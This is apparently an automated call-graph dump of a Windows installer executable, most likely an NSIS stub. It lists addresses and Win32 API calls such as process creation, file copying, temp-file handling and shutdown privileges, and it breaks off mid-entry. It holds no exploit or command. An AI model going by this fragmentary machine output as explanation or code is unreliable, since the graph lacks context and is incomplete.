3831 406579 17 API calls 3830->3831 3832 402d31 3831->3832 3832->3818 3833->3826 3834->3826 3835 401c43 3836 402d1c 17 API calls 3835->3836 3837 401c4a 3836->3837 3838 402d1c 17 API calls 3837->3838 3839 401c57 3838->3839 3840 401c6c 3839->3840 3842 402d3e 17 API calls 3839->3842 3841 401c7c 3840->3841 3843 402d3e 17 API calls 3840->3843 3844 401cd3 3841->3844 3845 401c87 3841->3845 3842->3840 3843->3841 3847 402d3e 17 API calls 3844->3847 3846 402d1c 17 API calls 3845->3846 3848 401c8c 3846->3848 3849 401cd8 3847->3849 3851 402d1c 17 API calls 3848->3851 3850 402d3e 17 API calls 3849->3850 3852 401ce1 FindWindowExW 3850->3852 3853 401c98 3851->3853 3856 401d03 3852->3856 3854 401cc3 SendMessageW 3853->3854 3855 401ca5 SendMessageTimeoutW 3853->3855 3854->3856 3855->3856 3857 402b43 3858 406931 5 API calls 3857->3858 3859 402b4a 3858->3859 3860 402d3e 17 API calls 3859->3860 3861 402b53 3860->3861 3862 402b57 IIDFromString 3861->3862 3864 402b8e 3861->3864 3863 402b66 3862->3863 3862->3864 3863->3864 3867 40653c lstrcpynW 3863->3867 3866 402b83 CoTaskMemFree 3866->3864 3867->3866 3868 402947 3869 402d3e 17 API calls 3868->3869 3870 402955 3869->3870 3871 40296b 3870->3871 3872 402d3e 17 API calls 3870->3872 3873 40600d 2 API calls 3871->3873 3872->3871 3874 402971 3873->3874 3896 406032 GetFileAttributesW CreateFileW 3874->3896 3876 40297e 3877 402a21 3876->3877 3878 40298a GlobalAlloc 3876->3878 3881 402a29 DeleteFileW 3877->3881 3882 402a3c 3877->3882 3879 4029a3 3878->3879 3880 402a18 CloseHandle 3878->3880 3897 403590 SetFilePointer 3879->3897 3880->3877 3881->3882 3884 4029a9 3885 40357a ReadFile 3884->3885 3886 4029b2 GlobalAlloc 3885->3886 3887 4029c2 3886->3887 3888 4029f6 3886->3888 3889 403309 44 API calls 3887->3889 3890 4060e4 WriteFile 3888->3890 3895 4029cf 3889->3895 3891 402a02 GlobalFree 3890->3891 3892 403309 44 API calls 3891->3892 3893 402a15 3892->3893 3893->3880 3894 4029ed GlobalFree 3894->3888 3895->3894 3896->3876 3897->3884 3898 4045c8 lstrcpynW lstrlenW 3899 403bc9 3900 403bd4 3899->3900 3901 403bdb GlobalAlloc 3900->3901 3902 403bd8 3900->3902 3901->3902 3906 4016cc 3907 402d3e 17 API calls 3906->3907 3908 4016d2 GetFullPathNameW 3907->3908 3909 4016ec 3908->3909 3915 40170e 3908->3915 3912 40689a 2 API calls 3909->3912 3909->3915 3910 402bc2 3911 401723 GetShortPathNameW 3911->3910 3913 4016fe 3912->3913 3913->3915 3916 40653c lstrcpynW 3913->3916 3915->3910 3915->3911 3916->3915 3917 401e4e GetDC 3918 402d1c 17 API calls 3917->3918 3919 401e60 GetDeviceCaps MulDiv ReleaseDC 3918->3919 3920 402d1c 17 API calls 3919->3920 3921 401e91 3920->3921 3922 406579 17 API calls 3921->3922 3923 401ece CreateFontIndirectW 3922->3923 3924 402630 3923->3924 3932 402acf 3933 402d1c 17 API calls 3932->3933 3934 402ad5 3933->3934 3935 402925 3934->3935 3936 402b12 3934->3936 3938 402ae7 3934->3938 3936->3935 3937 406579 17 API calls 3936->3937 3937->3935 3938->3935 3940 406483 wsprintfW 3938->3940 3940->3935 3941 4020d0 3942 4020e2 3941->3942 3952 402194 3941->3952 3943 402d3e 17 API calls 3942->3943 3945 4020e9 3943->3945 3944 401423 24 API calls 3946 4022ee 3944->3946 3947 402d3e 17 API calls 3945->3947 3948 4020f2 3947->3948 3949 402108 LoadLibraryExW 3948->3949 3950 4020fa GetModuleHandleW 3948->3950 3951 402119 3949->3951 3949->3952 3950->3949 3950->3951 3961 4069a0 3951->3961 3952->3944 3955 402163 3957 4055a4 24 API calls 3955->3957 3956 40212a 3958 401423 24 API calls 3956->3958 3959 40213a 3956->3959 3957->3959 3958->3959 3959->3946 3960 402186 FreeLibrary 3959->3960 3960->3946 3966 40655e WideCharToMultiByte 3961->3966 3963 4069bd 3964 4069c4 GetProcAddress 3963->3964 3965 402124 3963->3965 3964->3965 3965->3955 3965->3956 3966->3963 3967 404651 3968 404669 3967->3968 3971 404783 3967->3971 3998 404492 3968->3998 3969 4047ed 3970 4047f7 GetDlgItem 3969->3970 3973 4048b7 3969->3973 3974 404811 3970->3974 3975 404878 3970->3975 3971->3969 3971->3973 3976 4047be GetDlgItem SendMessageW 3971->3976 4010 4044f9 3973->4010 3974->3975 3979 404837 SendMessageW LoadCursorW SetCursor 3974->3979 3975->3973 3980 40488a 3975->3980 4003 4044b4 EnableWindow 3976->4003 3977 4046d0 3982 404492 18 API calls 3977->3982 4007 404900 3979->4007 3985 4048a0 3980->3985 3986 404890 SendMessageW 3980->3986 3988 4046dd CheckDlgButton 3982->3988 3983 4048b2 3985->3983 3990 4048a6 SendMessageW 3985->3990 3986->3985 3987 4047e8 4004 4048dc 3987->4004 4001 4044b4 EnableWindow 3988->4001 3990->3983 3993 4046fb GetDlgItem 4002 4044c7 SendMessageW 3993->4002 3995 404711 SendMessageW 3996 404737 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3995->3996 3997 40472e GetSysColor 3995->3997 3996->3983 3997->3996 3999 406579 17 API calls 3998->3999 4000 40449d SetDlgItemTextW 3999->4000 4000->3977 4001->3993 4002->3995 4003->3987 4005 4048ea 4004->4005 4006 4048ef SendMessageW 4004->4006 4005->4006 4006->3969 4024 405b68 ShellExecuteExW 4007->4024 4009 404866 LoadCursorW SetCursor 4009->3975 4011 4045bc 4010->4011 4012 404511 GetWindowLongW 4010->4012 4011->3983 4012->4011 4013 404526 4012->4013 4013->4011 4014 404553 GetSysColor 4013->4014 4015 404556 4013->4015 4014->4015 4016 404566 SetBkMode 4015->4016 4017 40455c SetTextColor 4015->4017 4018 404584 4016->4018 4019 40457e GetSysColor 4016->4019 4017->4016 4020 404595 4018->4020 4021 40458b SetBkColor 4018->4021 4019->4018 4020->4011 4022 4045a8 DeleteObject 4020->4022 4023 4045af CreateBrushIndirect 4020->4023 4021->4020 4022->4023 4023->4011 4024->4009 4025 4028d5 4026 4028dd 4025->4026 4027 4028e1 FindNextFileW 4026->4027 4030 4028f3 4026->4030 4028 40293a 4027->4028 4027->4030 4031 40653c lstrcpynW 4028->4031 4031->4030 4032 401956 4033 402d3e 17 API calls 4032->4033 4034 40195d lstrlenW 4033->4034 4035 402630 4034->4035 4036 4014d7 4037 402d1c 17 API calls 4036->4037 4038 4014dd Sleep 4037->4038 4040 402bc2 4038->4040 3331 4035d8 SetErrorMode GetVersion 3332 403617 3331->3332 3333 40361d 3331->3333 3334 406931 5 API calls 3332->3334 3335 4068c1 3 API calls 3333->3335 3334->3333 3336 403633 lstrlenA 3335->3336 3336->3333 3337 403643 3336->3337 3338 406931 5 API calls 3337->3338 3339 40364a 3338->3339 3340 406931 5 API calls 3339->3340 3341 403651 3340->3341 3342 406931 5 API calls 3341->3342 3343 40365d #17 OleInitialize SHGetFileInfoW 3342->3343 3421 40653c lstrcpynW 3343->3421 3346 4036a9 GetCommandLineW 3422 40653c lstrcpynW 3346->3422 3348 4036bb 3349 405e3e CharNextW 3348->3349 3350 4036e0 CharNextW 3349->3350 3351 40380a GetTempPathW 3350->3351 3359 4036f9 3350->3359 3423 4035a7 3351->3423 3353 403822 3354 403826 GetWindowsDirectoryW lstrcatW 3353->3354 3355 40387c DeleteFileW 3353->3355 3356 4035a7 12 API calls 3354->3356 3433 403068 GetTickCount GetModuleFileNameW 3355->3433 3360 403842 3356->3360 3357 405e3e CharNextW 3357->3359 3359->3357 3366 4037f5 3359->3366 3368 4037f3 3359->3368 3360->3355 3362 403846 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3360->3362 3361 403890 3363 403947 ExitProcess OleUninitialize 3361->3363 3374 405e3e CharNextW 3361->3374 3405 403933 3361->3405 3367 4035a7 12 API calls 3362->3367 3364 403a7d 3363->3364 3365 40395d 3363->3365 3370 403b01 ExitProcess 3364->3370 3371 403a85 GetCurrentProcess OpenProcessToken 3364->3371 3538 405ba2 3365->3538 3520 40653c lstrcpynW 3366->3520 3372 403874 3367->3372 3368->3351 3379 403ad1 3371->3379 3380 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3371->3380 3372->3355 3372->3363 3385 4038af 3374->3385 3381 406931 5 API calls 3379->3381 3380->3379 3384 403ad8 3381->3384 3382 403973 3386 405b0d 5 API calls 3382->3386 3383 40390d 3521 405f19 3383->3521 3388 403aed ExitWindowsEx 3384->3388 3389 403afa 3384->3389 3385->3382 3385->3383 3390 403978 lstrcatW 3386->3390 3388->3370 3388->3389 3551 40140b 3389->3551 3393 403994 lstrcatW lstrcmpiW 3390->3393 3394 403989 lstrcatW 3390->3394 3393->3363 3395 4039b0 3393->3395 3394->3393 3397 4039b5 3395->3397 3398 4039bc 3395->3398 3400 405a73 4 API calls 3397->3400 3402 405af0 2 API calls 3398->3402 3399 403928 3537 40653c lstrcpynW 3399->3537 3404 4039ba 3400->3404 3403 4039c1 SetCurrentDirectoryW 3402->3403 3406 4039d1 3403->3406 3407 4039dc 3403->3407 3404->3403 3463 403c0b 3405->3463 3542 40653c lstrcpynW 3406->3542 3543 40653c lstrcpynW 3407->3543 3410 406579 17 API calls 3411 403a1b DeleteFileW 3410->3411 3412 403a28 CopyFileW 3411->3412 3418 4039ea 3411->3418 3412->3418 3413 403a71 3414 406302 36 API calls 3413->3414 3416 403a78 3414->3416 3416->3363 3417 406579 17 API calls 3417->3418 3418->3410 3418->3413 3418->3417 3420 403a5c CloseHandle 3418->3420 3544 406302 MoveFileExW 3418->3544 3548 405b25 CreateProcessW 3418->3548 3420->3418 3421->3346 3422->3348 3424 4067eb 5 API calls 3423->3424 3425 4035b3 3424->3425 3426 4035bd 3425->3426 3554 405e11 lstrlenW CharPrevW 3425->3554 3426->3353 3429 405af0 2 API calls 3430 4035cb 3429->3430 3557 406061 3430->3557 3561 406032 GetFileAttributesW CreateFileW 3433->3561 3435 4030ab 3462 4030b8 3435->3462 3562 40653c lstrcpynW 3435->3562 3437 4030ce 3563 405e5d lstrlenW 3437->3563 3441 4030df GetFileSize 3442 4030f6 3441->3442 3457 4031d9 3441->3457 3449 403276 3442->3449 3456 402fc6 32 API calls 3442->3456 3442->3457 3442->3462 3599 40357a 3442->3599 3446 40321e GlobalAlloc 3447 403235 3446->3447 3452 406061 2 API calls 3447->3452 3450 402fc6 32 API calls 3449->3450 3450->3462 3451 4031ff 3453 40357a ReadFile 3451->3453 3454 403246 CreateFileW 3452->3454 3455 40320a 3453->3455 3458 403280 3454->3458 3454->3462 3455->3446 3455->3462 3456->3442 3568 402fc6 3457->3568 3583 403590 SetFilePointer 3458->3583 3460 40328e 3584 403309 3460->3584 3462->3361 3464 406931 5 API calls 3463->3464 3465 403c1f 3464->3465 3466 403c25 GetUserDefaultUILanguage 3465->3466 3467 403c37 3465->3467 3635 406483 wsprintfW 3466->3635 3469 40640a 3 API calls 3467->3469 3471 403c67 3469->3471 3470 403c35 3636 403ee1 3470->3636 3472 403c86 lstrcatW 3471->3472 3473 40640a 3 API calls 3471->3473 3472->3470 3473->3472 3476 405f19 18 API calls 3477 403cb8 3476->3477 3478 403d4c 3477->3478 3480 40640a 3 API calls 3477->3480 3479 405f19 18 API calls 3478->3479 3481 403d52 3479->3481 3482 403cea 3480->3482 3483 403d62 LoadImageW 3481->3483 3484 406579 17 API calls 3481->3484 3482->3478 3487 403d0b lstrlenW 3482->3487 3491 405e3e CharNextW 3482->3491 3485 403e08 3483->3485 3486 403d89 RegisterClassW 3483->3486 3484->3483 3490 40140b 2 API calls 3485->3490 3488 403943 3486->3488 3489 403dbf SystemParametersInfoW CreateWindowExW 3486->3489 3492 403d19 lstrcmpiW 3487->3492 3493 403d3f 3487->3493 3488->3363 3489->3485 3494 403e0e 3490->3494 3496 403d08 3491->3496 3492->3493 3497 403d29 GetFileAttributesW 3492->3497 3495 405e11 3 API calls 3493->3495 3494->3488 3498 403ee1 18 API calls 3494->3498 3499 403d45 3495->3499 3496->3487 3500 403d35 3497->3500 3502 403e1f 3498->3502 3644 40653c lstrcpynW 3499->3644 3500->3493 3501 405e5d 2 API calls 3500->3501 3501->3493 3504 403e2b ShowWindow 3502->3504 3505 403eae 3502->3505 3507 4068c1 3 API calls 3504->3507 3645 405677 OleInitialize 3505->3645 3511 403e43 3507->3511 3508 403eb4 3509 403ed0 3508->3509 3512 403eb8 3508->3512 3513 40140b 2 API calls 3509->3513 3510 403e51 GetClassInfoW 3515 403e65 GetClassInfoW RegisterClassW 3510->3515 3516 403e7b DialogBoxParamW 3510->3516 3511->3510 3514 4068c1 3 API calls 3511->3514 3512->3488 3517 40140b 2 API calls 3512->3517 3513->3488 3514->3510 3515->3516 3518 40140b 2 API calls 3516->3518 3517->3488 3519 403ea3 3518->3519 3519->3488 3520->3368 3663 40653c lstrcpynW 3521->3663 3523 405f2a 3524 405ebc 4 API calls 3523->3524 3525 405f30 3524->3525 3526 403919 3525->3526 3527 4067eb 5 API calls 3525->3527 3526->3363 3536 40653c lstrcpynW 3526->3536 3528 405f40 3527->3528 3528->3526 3534 405f57 3528->3534 3529 405f71 lstrlenW 3530 405f7c 3529->3530 3529->3534 3532 405e11 3 API calls 3530->3532 3533 405f81 GetFileAttributesW 3532->3533 3533->3526 3534->3526 3534->3529 3535 405e5d 2 API calls 3534->3535 3664 40689a FindFirstFileW 3534->3664 3535->3529 3536->3399 3537->3405 3539 405bb7 3538->3539 3540 405bcb MessageBoxIndirectW 3539->3540 3541 40396b ExitProcess 3539->3541 3540->3541 3542->3407 3543->3418 3545 406316 3544->3545 3547 406323 3544->3547 3667 406188 3545->3667 3547->3418 3549 405b64 3548->3549 3550 405b58 CloseHandle 3548->3550 3549->3418 3550->3549 3552 401389 2 API calls 3551->3552 3553 401420 3552->3553 3553->3370 3555 4035c5 3554->3555 3556 405e2d lstrcatW 3554->3556 3555->3429 3556->3555 3558 40606e GetTickCount GetTempFileNameW 3557->3558 3559 4060a4 3558->3559 3560 4035d6 3558->3560 3559->3558 3559->3560 3560->3353 3561->3435 3562->3437 3564 405e6b 3563->3564 3565 405e71 CharPrevW 3564->3565 3566 4030d4 3564->3566 3565->3564 3565->3566 3567 40653c lstrcpynW 3566->3567 3567->3441 3569 402fd7 3568->3569 3570 402fef 3568->3570 3573 402fe0 DestroyWindow 3569->3573 3576 402fe7 3569->3576 3571 402ff7 3570->3571 3572 402fff GetTickCount 3570->3572 3603 40696d 3571->3603 3575 40300d 3572->3575 3572->3576 3573->3576 3577 403042 CreateDialogParamW ShowWindow 3575->3577 3578 403015 3575->3578 3576->3446 3576->3462 3602 403590 SetFilePointer 3576->3602 3577->3576 3578->3576 3607 402faa 3578->3607 3580 403023 wsprintfW 3581 4055a4 24 API calls 3580->3581 3582 403040 3581->3582 3582->3576 3583->3460 3585 403334 3584->3585 3586 403318 SetFilePointer 3584->3586 3610 403411 GetTickCount 3585->3610 3586->3585 3589 4033d1 3589->3462 3592 403411 42 API calls 3593 40336b 3592->3593 3593->3589 3594 4033d7 ReadFile 3593->3594 3596 40337a 3593->3596 3594->3589 3596->3589 3597 4060b5 ReadFile 3596->3597 3625 4060e4 WriteFile 3596->3625 3597->3596 3600 4060b5 ReadFile 3599->3600 3601 40358d 3600->3601 3601->3442 3602->3451 3604 40698a PeekMessageW 3603->3604 3605 406980 DispatchMessageW 3604->3605 3606 40699a 3604->3606 3605->3604 3606->3576 3608 402fb9 3607->3608 3609 402fbb MulDiv 3607->3609 3608->3609 3609->3580 3611 403569 3610->3611 3612 40343f 3610->3612 3613 402fc6 32 API calls 3611->3613 3627 403590 SetFilePointer 3612->3627 3615 40333b 3613->3615 3615->3589 3623 4060b5 ReadFile 3615->3623 3616 40344a SetFilePointer 3617 40346f 3616->3617 3617->3615 3618 40357a ReadFile 3617->3618 3620 402fc6 32 API calls 3617->3620 3621 4060e4 WriteFile 3617->3621 3622 40354a SetFilePointer 3617->3622 3628 406aac 3617->3628 3618->3617 3620->3617 3621->3617 3622->3611 3624 403354 3623->3624 3624->3589 3624->3592 3626 406102 3625->3626 3626->3596 3627->3616 3629 406ad1 3628->3629 3632 406ad9 3628->3632 3629->3617 3630 406b60 GlobalFree 3631 406b69 GlobalAlloc 3630->3631 3631->3629 3631->3632 3632->3629 3632->3630 3632->3631 3633 406be0 GlobalAlloc 3632->3633 3634 406bd7 GlobalFree 3632->3634 3633->3629 3633->3632 3634->3633 3635->3470 3637 403ef5 3636->3637 3652 406483 wsprintfW 3637->3652 3639 403f66 3653 403f9a 3639->3653 3641 403c96 3641->3476 3642 403f6b 3642->3641 3643 406579 17 API calls 3642->3643 3643->3642 3644->3478 3656 4044de 3645->3656 3647 40569a 3651 4056c1 3647->3651 3659 401389 3647->3659 3648 4044de SendMessageW 3649 4056d3 OleUninitialize 3648->3649 3649->3508 3651->3648 3652->3639 3654 406579 17 API calls 3653->3654 3655 403fa8 SetWindowTextW 3654->3655 3655->3642 3657 4044f6 3656->3657 3658 4044e7 SendMessageW 3656->3658 3657->3647 3658->3657 3661 401390 3659->3661 3660 4013fe 3660->3647 3661->3660 3662 4013cb MulDiv SendMessageW 3661->3662 3662->3661 3663->3523 3665 4068b0 FindClose 3664->3665 3666 4068bb 3664->3666 3665->3666 3666->3534 3668 4061b8 3667->3668 3669 4061de GetShortPathNameW 3667->3669 3694 406032 GetFileAttributesW CreateFileW 3668->3694 3671 4061f3 3669->3671 3672 4062fd 3669->3672 3671->3672 3674 4061fb wsprintfA 3671->3674 3672->3547 3673 4061c2 CloseHandle GetShortPathNameW 3673->3672 3675 4061d6 3673->3675 3676 406579 17 API calls 3674->3676 3675->3669 3675->3672 3677 406223 3676->3677 3695 406032 GetFileAttributesW CreateFileW 3677->3695 3679 406230 3679->3672 3680 40623f GetFileSize GlobalAlloc 3679->3680 3681 406261 3680->3681 3682 4062f6 CloseHandle 3680->3682 3683 4060b5 ReadFile 3681->3683 3682->3672 3684 406269 3683->3684 3684->3682 3696 405f97 lstrlenA 3684->3696 3687 406280 lstrcpyA 3690 4062a2 3687->3690 3688 406294 3689 405f97 4 API calls 3688->3689 3689->3690 3691 4062d9 SetFilePointer 3690->3691 3692 4060e4 WriteFile 3691->3692 3693 4062ef GlobalFree 3692->3693 3693->3682 3694->3673 3695->3679 3697 405fd8 lstrlenA 3696->3697 3698 405fe0 3697->3698 3699 405fb1 lstrcmpiA 3697->3699 3698->3687 3698->3688 3699->3698 3700 405fcf CharNextA 3699->3700 3700->3697 4041 404cd9 4042 404d05 4041->4042 4043 404ce9 4041->4043 4045 404d38 4042->4045 4046 404d0b SHGetPathFromIDListW 4042->4046 4052 405b86 GetDlgItemTextW 4043->4052 4048 404d22 SendMessageW 4046->4048 4049 404d1b 4046->4049 4047 404cf6 SendMessageW 4047->4042 4048->4045 4051 40140b 2 API calls 4049->4051 4051->4048 4052->4047 4053 406c5b 4054 406adf 4053->4054 4055 40744a 4054->4055 4056 406b60 GlobalFree 4054->4056 4057 406b69 GlobalAlloc 4054->4057 4058 406be0 GlobalAlloc 4054->4058 4059 406bd7 GlobalFree 4054->4059 4056->4057 4057->4054 4057->4055 4058->4054 4058->4055 4059->4058 4060 40175c 4061 402d3e 17 API calls 4060->4061 4062 401763 4061->4062 4063 406061 2 API calls 4062->4063 4064 40176a 4063->4064 4064->4064 4065 401d5d 4066 402d1c 17 API calls 4065->4066 4067 401d6e SetWindowLongW 4066->4067 4068 402bc2 4067->4068 4069 401ede 4070 402d1c 17 API calls 4069->4070 4071 401ee4 4070->4071 4072 402d1c 17 API calls 4071->4072 4073 401ef0 4072->4073 4074 401f07 EnableWindow 4073->4074 4075 401efc ShowWindow 4073->4075 4076 402bc2 4074->4076 4075->4076 4077 401563 4078 402b08 4077->4078 4081 406483 wsprintfW 4078->4081 4080 402b0d 4081->4080 4082 4056e3 4083 405704 GetDlgItem GetDlgItem GetDlgItem 4082->4083 4084 40588d 4082->4084 4127 4044c7 SendMessageW 4083->4127 4086 405896 GetDlgItem CreateThread CloseHandle 4084->4086 4087 4058be 4084->4087 4086->4087 4089 4058e9 4087->4089 4091 4058d5 ShowWindow ShowWindow 4087->4091 4092 40590e 4087->4092 4088 405774 4097 40577b GetClientRect GetSystemMetrics SendMessageW SendMessageW 4088->4097 4090 405949 4089->4090 4094 405923 ShowWindow 4089->4094 4095 4058fd 4089->4095 4090->4092 4104 405957 SendMessageW 4090->4104 4129 4044c7 SendMessageW 4091->4129 4096 4044f9 8 API calls 4092->4096 4100 405943 4094->4100 4101 405935 4094->4101 4130 40446b 4095->4130 4099 40591c 4096->4099 4102 4057e9 4097->4102 4103 4057cd SendMessageW SendMessageW 4097->4103 4109 40446b SendMessageW 4100->4109 4108 4055a4 24 API calls 4101->4108 4105 4057fc 4102->4105 4106 4057ee SendMessageW 4102->4106 4103->4102 4104->4099 4107 405970 CreatePopupMenu 4104->4107 4111 404492 18 API calls 4105->4111 4106->4105 4110 406579 17 API calls 4107->4110 4108->4100 4109->4090 4112 405980 AppendMenuW 4110->4112 4113 40580c 4111->4113 4114 4059b0 TrackPopupMenu 4112->4114 4115 40599d GetWindowRect 4112->4115 4116 405815 ShowWindow 4113->4116 4117 405849 GetDlgItem SendMessageW 4113->4117 4114->4099 4118 4059cb 4114->4118 4115->4114 4119 405838 4116->4119 4120 40582b ShowWindow 4116->4120 4117->4099 4121 405870 SendMessageW SendMessageW 4117->4121 4122 4059e7 SendMessageW 4118->4122 4128 4044c7 SendMessageW 4119->4128 4120->4119 4121->4099 4122->4122 4123 405a04 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4122->4123 4125 405a29 SendMessageW 4123->4125 4125->4125 4126 405a52 GlobalUnlock SetClipboardData CloseClipboard 4125->4126 4126->4099 4127->4088 4128->4117 4129->4089 4131 404472 4130->4131 4132 404478 SendMessageW 4130->4132 4131->4132 4132->4092 4140 4026e4 4141 402d1c 17 API calls 4140->4141 4149 4026f3 4141->4149 4142 402830 4143 40273d ReadFile 4143->4142 4143->4149 4144 4060b5 ReadFile 4144->4149 4146 402832 4162 406483 wsprintfW 4146->4162 4147 40277d MultiByteToWideChar 4147->4149 4149->4142 4149->4143 4149->4144 4149->4146 4149->4147 4150 4027a3 SetFilePointer MultiByteToWideChar 4149->4150 4151 402843 4149->4151 4153 406113 SetFilePointer 4149->4153 4150->4149 4151->4142 4152 402864 SetFilePointer 4151->4152 4152->4142 4154 40612f 4153->4154 4156 406147 4153->4156 4155 4060b5 ReadFile 4154->4155 4157 40613b 4155->4157 4156->4149 4157->4156 4158 406150 SetFilePointer 4157->4158 4159 406178 SetFilePointer 4157->4159 4158->4159 4160 40615b 4158->4160 4159->4156 4161 4060e4 WriteFile 4160->4161 4161->4156 4162->4142 3701 405b68 ShellExecuteExW 4163 401968 4164 402d1c 17 API calls 4163->4164 4165 40196f 4164->4165 4166 402d1c 17 API calls 4165->4166 4167 40197c 4166->4167 4168 402d3e 17 API calls 4167->4168 4169 401993 lstrlenW 4168->4169 4170 4019a4 4169->4170 4171 4019e5 4170->4171 4175 40653c lstrcpynW 4170->4175 4173 4019d5 4173->4171 4174 4019da lstrlenW 4173->4174 4174->4171 4175->4173 4176 40166a 4177 402d3e 17 API calls 4176->4177 4178 401670 4177->4178 4179 40689a 2 API calls 4178->4179 4180 401676 4179->4180 4181 4023ec 4182 402d3e 17 API calls 4181->4182 4183 4023fb 4182->4183 4184 402d3e 17 API calls 4183->4184 4185 402404 4184->4185 4186 402d3e 17 API calls 4185->4186 4187 40240e GetPrivateProfileStringW 4186->4187 3768 40176f 3769 402d3e 17 API calls 3768->3769 3770 401776 3769->3770 3771 401796 3770->3771 3772 40179e 3770->3772 3808 40653c lstrcpynW 3771->3808 3809 40653c lstrcpynW 3772->3809 3775 40179c 3779 4067eb 5 API calls 3775->3779 3776 4017a9 3777 405e11 3 API calls 3776->3777 3778 4017af lstrcatW 3777->3778 3778->3775 3785 4017bb 3779->3785 3780 4017c1 3781 40689a 2 API calls 3780->3781 3784 4017cd CompareFileTime 3780->3784 3780->3785 3781->3780 3782 40600d 2 API calls 3782->3785 3784->3780 3785->3780 3785->3782 3786 40188d 3785->3786 3789 40653c lstrcpynW 3785->3789 3795 406579 17 API calls 3785->3795 3801 405ba2 MessageBoxIndirectW 3785->3801 3804 401864 3785->3804 3807 406032 GetFileAttributesW CreateFileW 3785->3807 3787 4055a4 24 API calls 3786->3787 3790 401897 3787->3790 3788 4055a4 24 API calls 3806 401879 3788->3806 3789->3785 3791 403309 44 API calls 3790->3791 3792 4018aa 3791->3792 3793 4018be SetFileTime 3792->3793 3794 4018d0 FindCloseChangeNotification 3792->3794 3793->3794 3796 4018e1 3794->3796 3794->3806 3795->3785 3797 4018e6 3796->3797 3798 4018f9 3796->3798 3799 406579 17 API calls 3797->3799 3800 406579 17 API calls 3798->3800 3802 4018ee lstrcatW 3799->3802 3803 401901 3800->3803 3801->3785 3802->3803 3805 405ba2 MessageBoxIndirectW 3803->3805 3804->3788 3804->3806 3805->3806 3807->3785 3808->3775 3809->3776 4188 401a72 4189 402d1c 17 API calls 4188->4189 4190 401a7b 4189->4190 4191 402d1c 17 API calls 4190->4191 4192 401a20 4191->4192 4193 401573 4194 401583 ShowWindow 4193->4194 4195 40158c 4193->4195 4194->4195 4196 40159a ShowWindow 4195->4196 4197 402bc2 4195->4197 4196->4197 4198 4014f5 SetForegroundWindow 4199 402bc2 4198->4199 4200 401ff6 4201 402d3e 17 API calls 4200->4201 4202 401ffd 4201->4202 4203 40689a 2 API calls 4202->4203 4204 402003 4203->4204 4206 402014 4204->4206 4207 406483 wsprintfW 4204->4207 4207->4206 4208 401b77 4209 402d3e 17 API calls 4208->4209 4210 401b7e 4209->4210 4211 402d1c 17 API calls 4210->4211 4212 401b87 wsprintfW 4211->4212 4213 402bc2 4212->4213 4214 4022f7 4215 402d3e 17 API calls 4214->4215 4216 4022fd 4215->4216 4217 402d3e 17 API calls 4216->4217 4218 402306 4217->4218 4219 402d3e 17 API calls 4218->4219 4220 40230f 4219->4220 4221 40689a 2 API calls 4220->4221 4222 402318 4221->4222 4223 402329 lstrlenW lstrlenW 4222->4223 4227 40231c 4222->4227 4225 4055a4 24 API calls 4223->4225 4224 4055a4 24 API calls 4228 402324 4224->4228 4226 402367 SHFileOperationW 4225->4226 4226->4227 4226->4228 4227->4224 4227->4228 4236 40167b 4237 402d3e 17 API calls 4236->4237 4238 401682 4237->4238 4239 402d3e 17 API calls 4238->4239 4240 40168b 4239->4240 4241 402d3e 17 API calls 4240->4241 4242 401694 MoveFileW 4241->4242 4243 4016a0 4242->4243 4244 4016a7 4242->4244 4245 401423 24 API calls 4243->4245 4246 40689a 2 API calls 4244->4246 4248 4022ee 4244->4248 4245->4248 4247 4016b6 4246->4247 4247->4248 4249 406302 36 API calls 4247->4249 4249->4243 4250 40237b 4251 402382 4250->4251 4255 402395 4250->4255 4252 406579 17 API calls 4251->4252 4253 40238f 4252->4253 4254 405ba2 MessageBoxIndirectW 4253->4254 4254->4255 4256 404eff GetDlgItem GetDlgItem 4257 404f53 7 API calls 4256->4257 4269 40517d 4256->4269 4258 404ff0 SendMessageW 4257->4258 4259 404ffd DeleteObject 4257->4259 4258->4259 4260 405008 4259->4260 4261 40503f 4260->4261 4263 406579 17 API calls 4260->4263 4264 404492 18 API calls 4261->4264 4262 405265 4265 40530e 4262->4265 4271 405170 4262->4271 4276 4052bb SendMessageW 4262->4276 4266 405021 SendMessageW SendMessageW 4263->4266 4270 405053 4264->4270 4267 405323 4265->4267 4268 405317 SendMessageW 4265->4268 4266->4260 4278 405335 ImageList_Destroy 4267->4278 4279 40533c 4267->4279 4287 40534c 4267->4287 4268->4267 4269->4262 4290 4051ef 4269->4290 4310 404e4d SendMessageW 4269->4310 4275 404492 18 API calls 4270->4275 4273 4044f9 8 API calls 4271->4273 4272 405257 SendMessageW 4272->4262 4277 405511 4273->4277 4291 405064 4275->4291 4276->4271 4281 4052d0 SendMessageW 4276->4281 4278->4279 4282 405345 GlobalFree 4279->4282 4279->4287 4280 4054c5 4280->4271 4285 4054d7 ShowWindow GetDlgItem ShowWindow 4280->4285 4284 4052e3 4281->4284 4282->4287 4283 40513f GetWindowLongW SetWindowLongW 4286 405158 4283->4286 4292 4052f4 SendMessageW 4284->4292 4285->4271 4288 405175 4286->4288 4289 40515d ShowWindow 4286->4289 4287->4280 4301 405387 4287->4301 4315 404ecd 4287->4315 4309 4044c7 SendMessageW 4288->4309 4308 4044c7 SendMessageW 4289->4308 4290->4262 4290->4272 4291->4283 4293 40513a 4291->4293 4297 4050b7 SendMessageW 4291->4297 4299 4050f5 SendMessageW 4291->4299 4300 405109 SendMessageW 4291->4300 4292->4265 4293->4283 4293->4286 4294 4053cb 4302 405491 4294->4302 4306 40543f SendMessageW SendMessageW 4294->4306 4297->4291 4299->4291 4300->4291 4301->4294 4304 4053b5 SendMessageW 4301->4304 4303 40549b InvalidateRect 4302->4303 4305 4054a7 4302->4305 4303->4305 4304->4294 4305->4280 4324 404e08 4305->4324 4306->4294 4308->4271 4309->4269 4311 404e70 GetMessagePos ScreenToClient SendMessageW 4310->4311 4312 404eac SendMessageW 4310->4312 4313 404ea9 4311->4313 4314 404ea4 4311->4314 4312->4314 4313->4312 4314->4290 4327 40653c lstrcpynW 4315->4327 4317 404ee0 4328 406483 wsprintfW 4317->4328 4319 404eea 4320 40140b 2 API calls 4319->4320 4321 404ef3 4320->4321 4329 40653c lstrcpynW 4321->4329 4323 404efa 4323->4301 4330 404d3f 4324->4330 4326 404e1d 4326->4280 4327->4317 4328->4319 4329->4323 4331 